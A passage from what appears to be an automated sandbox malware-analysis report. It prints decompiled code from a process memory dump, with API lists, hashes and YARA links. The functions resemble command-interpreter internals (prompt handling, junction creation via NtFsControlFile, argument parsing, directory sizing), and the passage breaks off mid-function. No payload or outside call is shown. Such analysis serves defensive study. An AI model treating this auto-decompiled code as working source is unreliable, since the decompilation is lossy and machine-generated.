                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                              • String ID: %s $%s>$PROMPT$Unknown
                                              • API String ID: 708651206-3050974680
                                              • Opcode ID: b439409fb906958c3be5bda44a46acfd109cd6dffc9841c0901afec659cf3fd8
                                              • Instruction ID: fbcf4088e588fd6e9d6c45aeec4d5a19eefc6224d10ea1a3aeddd4ed070e1e40
                                              • Opcode Fuzzy Hash: b439409fb906958c3be5bda44a46acfd109cd6dffc9841c0901afec659cf3fd8
                                              • Instruction Fuzzy Hash: 4302E375A251168BCB24DF28DC49BBAB7B5EF45300F54829EE809E7250EF305EA1DF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002CB5E0, Relevance: 19.7, APIs: 13, Instructions: 180filememorynativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E002CB5E0(void* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				void* _v48;
				void* _t60;
				void _t64;
				void* _t68;
				signed int _t77;
				void _t80;
				signed short _t81;
				long _t88;
				WCHAR* _t91;
				void* _t97;
				intOrPtr* _t102;
				void* _t104;
				void* _t109;
				void* _t111;
				long _t114;
				void* _t115;
				void* _t116;
				void* _t117;

				_t115 = __ecx;
				_v40 = 0;
				_t114 = 1;
				_v16 = 0;
				_v36 = 0;
				_v24 = 0;
				_t91 = E002CB51A( *((intOrPtr*)(__ecx + 8)));
				_t116 = E002CB51A( *((intOrPtr*)(_t115 + 0xc)));
				if(_t91 == 0 || _t116 == 0) {
					L19:
					if(_v36 != 0) {
						RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v36);
					}
					if(_t114 != 0 && _v24 != 0) {
						RemoveDirectoryW(_t91);
					}
					return _t114;
				} else {
					if(E002CB9D3(_t91, 0, 1) != 0) {
						if(E002CB91D(_t116) != 0) {
							if(CreateDirectoryW(_t91, 0) == 0) {
								goto L19;
							}
							_v24 = 1;
							_t60 = CreateFileW(_t91, 0x40000000, 1, 0, 3, 0x2000000, 0);
							_v20 = _t60;
							if(_t60 == 0xffffffff) {
								goto L19;
							}
							RtlDosPathNameToNtPathName_U(_t116,  &_v40, 0, 0);
							_t97 = _t116;
							_t10 = _t97 + 2; // 0x2
							_t109 = _t10;
							do {
								_t64 =  *_t97;
								_t97 = _t97 + 2;
							} while (_t64 != _v16);
							_v8 = (_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14;
							_t68 = E002B00B0((_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14);
							_v12 = _t68;
							if(_t68 == 0) {
								_t117 = _v20;
								L18:
								CloseHandle(_t117);
								goto L19;
							}
							memset(_t68, 0, _v8);
							_t102 = _v12;
							 *((short*)(_t102 + 4)) = _v8 + 0xfffffff8;
							 *_t102 = 0xa0000003;
							 *((short*)(_t102 + 8)) = 0;
							 *((short*)(_t102 + 0xa)) = _v40;
							memcpy(_t102 + 0x10, _v36, _v40 & 0x0000ffff);
							_t111 = _v12;
							_t77 =  *(_t111 + 0xa) & 0x0000ffff;
							_v32 = _t77;
							_t104 = _t116;
							 *((short*)(_t111 + 0xc)) = _t77 + 2;
							_t31 = _t104 + 2; // 0x2
							_v28 = _t31;
							do {
								_t80 =  *_t104;
								_t104 = _t104 + 2;
							} while (_t80 != _v16);
							_t81 = (_t104 - _v28 >> 1) + (_t104 - _v28 >> 1);
							 *(_t111 + 0xe) = _t81;
							memcpy((_v32 & 0x0000ffff) + _t111 + 0x12, _t116, _t81 & 0x0000ffff);
							_t117 = _v20;
							_t88 = NtFsControlFile(_t117, 0, 0, 0,  &_v48, 0x900a4, _v12, _v8, 0, 0);
							if(_t88 >= 0) {
								_t114 = 0;
							} else {
								SetLastError(RtlNtStatusToDosError(_t88));
							}
							goto L18;
						}
						_push(0x40002749);
						L4:
						SetLastError();
						goto L19;
					}
					_push(0x4000272e);
					goto L4;
				}
			}






























                                              0x002cb5ea
                                              0x002cb5f1
                                              0x002cb5f4
                                              0x002cb5f5
                                              0x002cb5fb
                                              0x002cb5fe
                                              0x002cb609
                                              0x002cb610
                                              0x002cb614
                                              0x002cb7a2
                                              0x002cb7a6
                                              0x002cb7b7
                                              0x002cb7b7
                                              0x002cb7bf
                                              0x002cb7c8
                                              0x002cb7c8
                                              0x002cb7d6
                                              0x002cb622
                                              0x002cb62e
                                              0x002cb649
                                              0x002cb65e
                                              0x00000000
                                              0x00000000
                                              0x002cb666
                                              0x002cb679
                                              0x002cb67f
                                              0x002cb685
                                              0x00000000
                                              0x00000000
                                              0x002cb694
                                              0x002cb69a
                                              0x002cb69c
                                              0x002cb69c
                                              0x002cb69f
                                              0x002cb69f
                                              0x002cb6a2
                                              0x002cb6a5
                                              0x002cb6bb
                                              0x002cb6be
                                              0x002cb6c3
                                              0x002cb6c8
                                              0x002cb798
                                              0x002cb79b
                                              0x002cb79c
                                              0x00000000
                                              0x002cb79c
                                              0x002cb6d5
                                              0x002cb6da
                                              0x002cb6e6
                                              0x002cb6ef
                                              0x002cb6f5
                                              0x002cb6fd
                                              0x002cb70a
                                              0x002cb70f
                                              0x002cb715
                                              0x002cb71e
                                              0x002cb721
                                              0x002cb723
                                              0x002cb727
                                              0x002cb72a
                                              0x002cb72d
                                              0x002cb72d
                                              0x002cb730
                                              0x002cb733
                                              0x002cb73e
                                              0x002cb741
                                              0x002cb756
                                              0x002cb75e
                                              0x002cb778
                                              0x002cb780
                                              0x002cb794
                                              0x002cb782
                                              0x002cb78a
                                              0x002cb78a
                                              0x00000000
                                              0x002cb780
                                              0x002cb64b
                                              0x002cb635
                                              0x002cb635
                                              0x00000000
                                              0x002cb635
                                              0x002cb630
                                              0x00000000
                                              0x002cb630

                                              APIs
                                                • Part of subcall function 002CB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 002CB533
                                                • Part of subcall function 002CB51A: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 002CB54F
                                                • Part of subcall function 002CB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 002CB560
                                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 002CB635
                                              • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 002CB656
                                              • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 002CB679
                                              • RtlDosPathNameToNtPathName_U.NTDLL ref: 002CB694
                                              • memset.MSVCRT ref: 002CB6D5
                                              • memcpy.MSVCRT ref: 002CB70A
                                              • memcpy.MSVCRT ref: 002CB756
                                              • NtFsControlFile.NTDLL ref: 002CB778
                                              • RtlNtStatusToDosError.NTDLL ref: 002CB783
                                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 002CB78A
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 002CB79C
                                              • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 002CB7B7
                                              • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002CB7C8
                                                • Part of subcall function 002CB9D3: memset.MSVCRT ref: 002CBA0F
                                                • Part of subcall function 002CB9D3: memset.MSVCRT ref: 002CBA37
                                                • Part of subcall function 002CB9D3: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 002CBAA8
                                                • Part of subcall function 002CB9D3: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 002CBAC7
                                                • Part of subcall function 002CB9D3: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 002CBB0B
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                              • String ID:
                                              • API String ID: 223857506-0
                                              • Opcode ID: 8773640b403131f87bc1f3370e86969896b471a8e40dc7fd2920b44380855c54
                                              • Instruction ID: fd4b895b97ffbdd51a0b404e145f7e266c9291c33d7e90c5aada7a26dc99aa0a
                                              • Opcode Fuzzy Hash: 8773640b403131f87bc1f3370e86969896b471a8e40dc7fd2920b44380855c54
                                              • Instruction Fuzzy Hash: 2051BD71920215ABDB169FB4CC4AFBEB7B8EF88300F14466EE806E7250E7359D51CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AE040, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 289COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E002AE040(long __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				signed int _v549;
				long _v556;
				long _v560;
				signed int _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t81;
				int _t85;
				void* _t89;
				WCHAR* _t90;
				signed char _t91;
				intOrPtr _t92;
				intOrPtr _t96;
				long _t104;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t110;
				int _t111;
				signed char _t113;
				void* _t114;
				intOrPtr _t116;
				signed int _t117;
				void* _t118;
				wchar_t* _t119;
				wchar_t* _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t129;
				long _t130;
				intOrPtr* _t131;
				signed int _t133;
				intOrPtr* _t134;
				long _t136;
				void* _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				long _t150;
				long _t151;
				signed int _t152;
				void* _t153;
				void* _t154;

				_t143 = __edx;
				_t81 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t81 ^ _t152;
				_v560 = __edx;
				_t150 = __ecx;
				_v549 = 0;
				_v556 = __ecx;
				_t122 = _t121 | 0xffffffff;
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t154 = _t153 + 0xc;
				if(_v24 == 0) {
					_t85 = 0x104;
				} else {
					_t85 = 0x7fe7;
				}
				_t124 =  &_v548;
				if(E002B0C70(_t124, _t85) < 0) {
					_t147 = 0xfffffffe;
					goto L31;
				} else {
					_t148 = 0;
					while(_t148 < 0x7fe6) {
						_t150 =  *( *((intOrPtr*)(_t150 + 0x38)) + _t148 * 2) & 0x0000ffff;
						_t116 = 0;
						if(_t150 == 0x22) {
							_t117 = _v549;
							_t124 = _t124 & 0xffffff00 | _t117 == 0x00000000;
							_v549 = _t124;
							if(_t117 == 0) {
								_t116 = 0;
							} else {
								_t116 = 1;
							}
							L8:
							if(_t124 != 0 || _t116 != 0) {
								L11:
								if(_t122 != 0xffffffff) {
									L13:
									_t118 = _v28;
									if(_t118 == 0) {
										_t118 =  &_v548;
									}
									 *(_t118 + _t148 * 2) = _t150;
									_t148 = _t148 + 1;
									_t150 = _v556;
									continue;
								}
								_t119 = wcschr(L":.\\", _t150);
								_t154 = _t154 + 8;
								if(_t119 != 0) {
									if( *0x2e3cc9 == 0) {
										break;
									}
									_t122 = _t148;
								}
								goto L13;
							} else {
								_t120 = wcschr(L"=,;+/[] \t\"", _t150);
								_t154 = _t154 + 8;
								if(_t120 != 0) {
									break;
								}
								goto L11;
							}
						}
						if(_t150 == 0) {
							break;
						}
						_t124 = _v549;
						goto L8;
					}
					_v564 = _t148;
					if(_t148 == 0) {
						_t147 = _t148 | 0xffffffff;
						L31:
						__imp__??_V@YAXPAX@Z();
						return E002B6FD0(_t147, _t122, _v8 ^ _t152, _t143, _t147, _t150, _v28);
					}
					_t89 = _v28;
					if(_t89 == 0) {
						_t89 =  &_v548;
					}
					 *((short*)(_t89 + _t148 * 2)) = 0;
					if(_t122 != 0xffffffff) {
						_t90 = _v28;
						if(_t90 == 0) {
							_t90 =  &_v548;
						}
						_t91 = GetFileAttributesW(_t90);
						if(_t91 != 0xffffffff) {
							if((_t91 & 0x00000010) == 0) {
								goto L18;
							}
							goto L54;
						} else {
							L54:
							_t114 = _v28;
							_v564 = _t122;
							if(_t114 == 0) {
								_t114 =  &_v548;
							}
							 *((short*)(_t114 + _t122 * 2)) = 0;
							goto L18;
						}
					} else {
						L18:
						_t122 = _v28;
						if(_t122 == 0) {
							_t122 =  &_v548;
						}
						_t149 = 0;
						_t150 = 0x2a1628;
						do {
							_t24 = _t150 - 8; // 0x2a35b0
							_t92 =  *_t24;
							if(_t92 == 0) {
								goto L22;
							}
							__imp___wcsicmp(_t122, _t92);
							_t154 = _t154 + 8;
							if(_t92 == 0) {
								_t113 =  *_t150 & 0x0000ffff;
								if((_t113 & 0x00000004) != 0) {
									if( *0x2e3cc9 != 0) {
										goto L25;
									}
									goto L22;
								}
								L25:
								_t128 = _v560;
								 *_v560 = _t113;
								L26:
								 *0x2cd0dc = _t149;
								if(_t149 == 0xffffffff) {
									if(_v28 == 0) {
										_t143 =  &_v548;
									}
									_t129 = 0x2d;
									if(E002ADFC0(0x2d, _t143, _t128) == 0x2d) {
										_t147 = 0x2d;
									} else {
										_v549 = 0;
										_t122 = 0;
										while(1) {
											_t150 =  *( *((intOrPtr*)(_v556 + 0x38)) + _t122 * 2) & 0x0000ffff;
											if(_t150 == 0) {
												break;
											}
											_t109 = 0;
											if(_t150 == 0x22) {
												_t110 = _v549;
												_t129 = _t129 & 0xffffff00 | _t110 == 0x00000000;
												_v549 = _t129;
												if(_t110 == 0) {
													_t109 = 0;
												} else {
													_t109 = 1;
												}
											} else {
												_t129 = _v549;
											}
											if(_t129 == 0) {
												if(_t109 != 0) {
													goto L42;
												}
												_t111 = iswspace(_t150);
												_t154 = _t154 + 4;
												if(_t111 != 0) {
													break;
												}
												_t129 = L"=,;";
												if(E002AD7D4(_t129, _t150) != 0 || _t150 == 0x2f) {
													break;
												} else {
													goto L42;
												}
											} else {
												L42:
												_t122 = _t122 + 1;
												continue;
											}
										}
										_t130 = _v556;
										L28:
										_t131 =  *((intOrPtr*)(_t130 + 0x38));
										_t32 = _t131 + 2; // 0x2
										_t143 = _t32;
										do {
											_t96 =  *_t131;
											_t131 = _t131 + 2;
										} while (_t96 != 0);
										_t133 = _t131 - _t143 >> 1;
										if(_t122 != _t133) {
											_t66 = _t133 + 1; // -1
											_t151 = _t66;
											_t134 =  *((intOrPtr*)(_v556 + 0x3c));
											if(_t134 == 0) {
												L76:
												_t136 = E002B00B0(_t151 + _t151);
												_v560 = _t136;
												if(_t136 == 0) {
													E002C9287(_t136);
													__imp__longjmp(0x2db8b8, 1);
												}
												_t122 = _t122 + _t122;
												_t143 = _t151;
												E002B1040(_t136, _t151,  *((intOrPtr*)(_v556 + 0x38)) + _t122);
												_t103 =  *((intOrPtr*)(_v556 + 0x3c));
												if( *((intOrPtr*)(_v556 + 0x3c)) == 0) {
													_t150 = _v560;
												} else {
													_t143 = _t151;
													_t150 = _v560;
													E002B18C0(_t150, _t151, _t103);
												}
												_t104 = _v556;
												 *(_t104 + 0x3c) = _t150;
												 *((short*)(_t122 +  *((intOrPtr*)(_t104 + 0x38)))) = 0;
												goto L31;
											}
											_t145 = _t134 + 2;
											do {
												_t108 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t108 != 0);
											_t151 = _t151 + (_t134 - _t145 >> 1);
											goto L76;
										}
									}
									goto L31;
								}
								_t130 = _v556;
								_t122 = _v564;
								if(_t149 == 0x14) {
									 *((intOrPtr*)(_t130 + 0x40)) = 1;
								}
								goto L28;
							}
							L22:
							_t150 = _t150 + 0x18;
							_t149 = _t149 + 1;
						} while (_t150 <= 0x2a1a18);
						_t128 = _v560;
						_t149 = _t149 | 0xffffffff;
						goto L26;
					}
				}
			}




















































                                              0x002ae040
                                              0x002ae04b
                                              0x002ae052
                                              0x002ae063
                                              0x002ae069
                                              0x002ae06b
                                              0x002ae075
                                              0x002ae07b
                                              0x002ae07e
                                              0x002ae085
                                              0x002ae089
                                              0x002ae090
                                              0x002ae095
                                              0x002ae09c
                                              0x002bbd1d
                                              0x002ae0a2
                                              0x002ae0a2
                                              0x002ae0a2
                                              0x002ae0a8
                                              0x002ae0b5
                                              0x002bbd27
                                              0x00000000
                                              0x002ae0bb
                                              0x002ae0bb
                                              0x002ae0c0
                                              0x002ae0cb
                                              0x002ae0cf
                                              0x002ae0d4
                                              0x002ae212
                                              0x002ae21a
                                              0x002ae21d
                                              0x002ae225
                                              0x002ae310
                                              0x002ae22b
                                              0x002ae22b
                                              0x002ae22b
                                              0x002ae0e5
                                              0x002ae0e7
                                              0x002ae100
                                              0x002ae103
                                              0x002ae11c
                                              0x002ae11c
                                              0x002ae121
                                              0x002bbd31
                                              0x002bbd31
                                              0x002ae127
                                              0x002ae12b
                                              0x002ae12c
                                              0x00000000
                                              0x002ae12c
                                              0x002ae10b
                                              0x002ae111
                                              0x002ae116
                                              0x002ae2d8
                                              0x00000000
                                              0x00000000
                                              0x002ae2de
                                              0x002ae2de
                                              0x00000000
                                              0x002ae0ed
                                              0x002ae0f3
                                              0x002ae0f9
                                              0x002ae0fe
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002ae0fe
                                              0x002ae0e7
                                              0x002ae0dd
                                              0x00000000
                                              0x00000000
                                              0x002ae0df
                                              0x00000000
                                              0x002ae0df
                                              0x002ae134
                                              0x002ae13c
                                              0x002bbd3c
                                              0x002ae1ea
                                              0x002ae1ed
                                              0x002ae208
                                              0x002ae208
                                              0x002ae142
                                              0x002ae147
                                              0x002bbd44
                                              0x002bbd44
                                              0x002ae14f
                                              0x002ae156
                                              0x002ae2e5
                                              0x002ae2ea
                                              0x002ae328
                                              0x002ae328
                                              0x002ae2ed
                                              0x002ae2f6
                                              0x002ae320
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002ae2f8
                                              0x002ae2f8
                                              0x002ae2f8
                                              0x002ae2fb
                                              0x002ae303
                                              0x002ae330
                                              0x002ae330
                                              0x002ae307
                                              0x00000000
                                              0x002ae307
                                              0x002ae15c
                                              0x002ae15c
                                              0x002ae15c
                                              0x002ae161
                                              0x002bbd4f
                                              0x002bbd4f
                                              0x002ae167
                                              0x002ae169
                                              0x002ae170
                                              0x002ae170
                                              0x002ae170
                                              0x002ae175
                                              0x00000000
                                              0x00000000
                                              0x002ae179
                                              0x002ae17f
                                              0x002ae184
                                              0x002ae19d
                                              0x002ae1a2
                                              0x002bbd61
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bbd67
                                              0x002ae1a8
                                              0x002ae1a8
                                              0x002ae1ae
                                              0x002ae1b1
                                              0x002ae1b1
                                              0x002ae1ba
                                              0x002ae237
                                              0x002bbd6c
                                              0x002bbd6c
                                              0x002ae23e
                                              0x002ae24b
                                              0x002bbd77
                                              0x002ae251
                                              0x002ae251
                                              0x002ae258
                                              0x002ae260
                                              0x002ae269
                                              0x002ae270
                                              0x00000000
                                              0x00000000
                                              0x002ae272
                                              0x002ae277
                                              0x002ae2b8
                                              0x002ae2c0
                                              0x002ae2c3
                                              0x002ae2cb
                                              0x002ae317
                                              0x002ae2cd
                                              0x002ae2cd
                                              0x002ae2cd
                                              0x002ae279
                                              0x002ae279
                                              0x002ae279
                                              0x002ae281
                                              0x002ae288
                                              0x00000000
                                              0x00000000
                                              0x002ae28b
                                              0x002ae291
                                              0x002ae296
                                              0x00000000
                                              0x00000000
                                              0x002ae29a
                                              0x002ae2a6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002ae283
                                              0x002ae283
                                              0x002ae283
                                              0x00000000
                                              0x002ae283
                                              0x002ae281
                                              0x002ae2ad
                                              0x002ae1cd
                                              0x002ae1cd
                                              0x002ae1d0
                                              0x002ae1d0
                                              0x002ae1d3
                                              0x002ae1d3
                                              0x002ae1d6
                                              0x002ae1d9
                                              0x002ae1e0
                                              0x002ae1e4
                                              0x002bbd87
                                              0x002bbd87
                                              0x002bbd8a
                                              0x002bbd8f
                                              0x002bbda5
                                              0x002bbdad
                                              0x002bbdaf
                                              0x002bbdb7
                                              0x002bbdb9
                                              0x002bbdc5
                                              0x002bbdc5
                                              0x002bbdd1
                                              0x002bbdd3
                                              0x002bbddb
                                              0x002bbde6
                                              0x002bbdeb
                                              0x002bbdff
                                              0x002bbded
                                              0x002bbded
                                              0x002bbdef
                                              0x002bbdf8
                                              0x002bbdf8
                                              0x002bbe05
                                              0x002bbe0d
                                              0x002bbe13
                                              0x00000000
                                              0x002bbe13
                                              0x002bbd91
                                              0x002bbd94
                                              0x002bbd94
                                              0x002bbd97
                                              0x002bbd9a
                                              0x002bbda3
                                              0x00000000
                                              0x002bbda3
                                              0x002ae1e4
                                              0x00000000
                                              0x002ae24b
                                              0x002ae1bc
                                              0x002ae1c2
                                              0x002ae1cb
                                              0x002ae209
                                              0x002ae209
                                              0x00000000
                                              0x002ae1cb
                                              0x002ae186
                                              0x002ae186
                                              0x002ae189
                                              0x002ae18a
                                              0x002ae192
                                              0x002ae198
                                              0x00000000
                                              0x002ae198
                                              0x002ae156

                                              APIs
                                              • memset.MSVCRT ref: 002AE090
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • wcschr.MSVCRT ref: 002AE0F3
                                              • wcschr.MSVCRT ref: 002AE10B
                                              • _wcsicmp.MSVCRT ref: 002AE179
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002AE1ED
                                              • iswspace.MSVCRT ref: 002AE28B
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00007FE7,?,?,00000000), ref: 002AE2ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memsetwcschr$AttributesFile_wcsicmpiswspace
                                              • String ID: :.\$=,;$=,;+/[] "
                                              • API String ID: 313872294-843887632
                                              • Opcode ID: d5ce1c72f7d0bc9b2a1618e69f2f14a52d80aee9e4d9feaffd3e50da1b6c983d
                                              • Instruction ID: 16866214d298e9d30d45f74c5289db6456b651ff2ac4edb3b1b51bbfa7da1cca
                                              • Opcode Fuzzy Hash: d5ce1c72f7d0bc9b2a1618e69f2f14a52d80aee9e4d9feaffd3e50da1b6c983d
                                              • Instruction Fuzzy Hash: A3A10930A242269BDF208F68DC84BF977B5AF46354F1601D9D80AA7291DFB09DA7CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AB89C, Relevance: 18.3, APIs: 12, Instructions: 257COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 52%
                                              			E002AB89C(WCHAR* __ecx, short* __edx, signed int _a4) {
				signed int _v12;
				int _v24;
				char _v28;
				void* _v32;
				void _v552;
				struct _WIN32_FIND_DATAW _v1144;
				int _v1148;
				signed int _v1152;
				void* _v1156;
				char _v1160;
				intOrPtr _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t71;
				intOrPtr _t74;
				void* _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				signed char _t80;
				short _t83;
				short _t84;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t110;
				signed int _t116;
				WCHAR* _t119;
				intOrPtr* _t124;
				WCHAR* _t129;
				signed int _t131;
				intOrPtr* _t134;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t140;
				signed int _t144;
				short* _t146;
				void* _t148;
				short* _t150;
				void* _t151;
				int _t154;
				intOrPtr* _t155;
				void* _t159;
				signed int _t160;
				void* _t161;

				_t145 = __edx;
				_t71 =  *0x2cd0b4; // 0x40f69e4c
				_v12 = _t71 ^ _t160;
				_t119 = __ecx;
				_v1152 = _a4;
				_t155 = __ecx;
				_v1148 = 0;
				_t150 =  &(__ecx[1]);
				do {
					_t74 =  *_t155;
					_t155 = _t155 + 2;
				} while (_t74 != 0);
				_t157 = _t155 - _t150 >> 1;
				if((_t155 - _t150 >> 1) + 2 > __edx) {
					L10:
					_t76 = 0;
					L8:
					_pop(_t151);
					return E002B6FD0(_t76, _t119, _v12 ^ _t160, _t145, _t151, _t157);
				}
				_t124 = __ecx;
				_t145 =  &(__ecx[1]);
				do {
					_t78 =  *_t124;
					_t124 = _t124 + 2;
				} while (_t78 != 0);
				_t157 = _v1152;
				_t126 = _t124 - _t145 >> 1;
				_t79 = (_t124 - _t145 >> 1) - 2;
				_v1164 = _t79;
				 *_t157 = _t79;
				_t80 = GetFileAttributesW(__ecx);
				if(_t80 == 0xffffffff) {
					_push(0);
					_push(GetLastError());
					E002AC5A2(_t126);
					goto L10;
				}
				if((_t80 & 0x00000010) != 0) {
					_t129 = _t119;
					_t146 =  &(_t129[1]);
					do {
						_t83 =  *_t129;
						_t129 =  &(_t129[1]);
					} while (_t83 != 0);
					_t131 = _t129 - _t146 >> 1;
					_t84 = 0x5c;
					_push(0x2a);
					if( *((intOrPtr*)(_t119 + _t131 * 2 - 2)) != _t84) {
						 *((short*)(_t119 + 4 + _t131 * 2)) = 0;
						_pop(_t145);
					} else {
						_t145 = 0;
						_pop(_t84);
					}
					_t119[_t131] = _t84;
					 *(_t119 + 2 + _t131 * 2) = _t145;
					_t86 = FindFirstFileW(_t119,  &_v1144);
					_v1156 = _t86;
					if(_t86 != 0xffffffff) {
						_t154 = 1;
						do {
							_t131 = ".";
							_t87 =  &(_v1144.cFileName);
							while(1) {
								_t145 =  *_t87;
								if(_t145 !=  *_t131) {
									break;
								}
								if(_t145 == 0) {
									L26:
									_t88 = 0;
									L28:
									if(_t88 == 0) {
										goto L57;
									}
									_t131 = L"..";
									_t96 =  &(_v1144.cFileName);
									while(1) {
										_t145 =  *_t96;
										if(_t145 !=  *_t131) {
											break;
										}
										if(_t145 == 0) {
											L34:
											_t97 = 0;
											L36:
											if(_t97 == 0) {
												goto L57;
											}
											_t134 =  &(_v1144.cFileName);
											_t145 = _t134 + 2;
											do {
												_t98 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t98 != _v1148);
											_t135 = _t134 - _t145;
											_t131 = _t135 >> 1;
											if(_t135 == 0) {
												goto L57;
											}
											if((_v1144.dwFileAttributes & 0x00000010) != 0) {
												_t99 =  *_t157;
												if(_t99 <= _t131) {
													_t99 = _t131;
												}
												 *_t157 = _t99;
												goto L57;
											}
											_v28 = 1;
											_v32 = 0;
											_v24 = 0x104;
											memset( &_v552, 0, 0x104);
											_t161 = _t161 + 0xc;
											if(E002B0C70( &_v552, ((0 | _v28 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
												SetLastError(8);
												L60:
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												L61:
												_t157 = GetLastError();
												FindClose(_v1156);
												if(_t154 != 0) {
													goto L10;
												}
												if(_t157 == 0x12) {
													goto L7;
												}
												_push(0);
												goto L64;
											}
											E002B0D89(_t145, _t119);
											_t148 = _v32;
											_t138 = _t148;
											if(_t148 == 0) {
												_t138 =  &_v552;
											}
											_t159 = _t138 + 2;
											do {
												_t110 =  *_t138;
												_t138 = _t138 + 2;
											} while (_t110 != _v1148);
											_t140 = _t138 - _t159 >> 1;
											if(_t148 == 0) {
												_t148 =  &_v552;
											}
											 *((short*)(_t148 + _t140 * 2 - 2)) = 0;
											E002B0CF2(_t148,  &(_v1144.cFileName));
											_t142 = _v32;
											if(_v32 == 0) {
												_t142 =  &_v552;
											}
											_t145 = _v24;
											if(E002AB89C(_t142, _v24,  &_v1160) == 0) {
												goto L60;
											} else {
												_t157 = _v1152;
												_t144 = _v1164 + _v1160;
												_t116 =  *_t157;
												if(_t116 <= _t144) {
													_t116 = _t144;
												}
												 *_t157 = _t116;
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												goto L57;
											}
										}
										_t145 =  *((intOrPtr*)(_t96 + 2));
										_t33 = _t131 + 2; // 0x2e
										if(_t145 !=  *_t33) {
											break;
										}
										_t96 = _t96 + 4;
										_t131 = _t131 + 4;
										if(_t145 != 0) {
											continue;
										}
										goto L34;
									}
									asm("sbb eax, eax");
									_t97 = _t96 | 0x00000001;
									goto L36;
								}
								_t145 =  *((intOrPtr*)(_t87 + 2));
								_t30 = _t131 + 2; // 0x200000
								if(_t145 !=  *_t30) {
									break;
								}
								_t87 = _t87 + 4;
								_t131 = _t131 + 4;
								if(_t145 != 0) {
									continue;
								}
								goto L26;
							}
							asm("sbb eax, eax");
							_t88 = _t87 | 0x00000001;
							goto L28;
							L57:
							_t154 = FindNextFileW(_v1156,  &_v1144);
						} while (_t154 != 0);
						goto L61;
					} else {
						_t157 = GetLastError();
						FindClose(0xffffffff);
						if(_t157 == 2 || _t157 == 0x12) {
							goto L7;
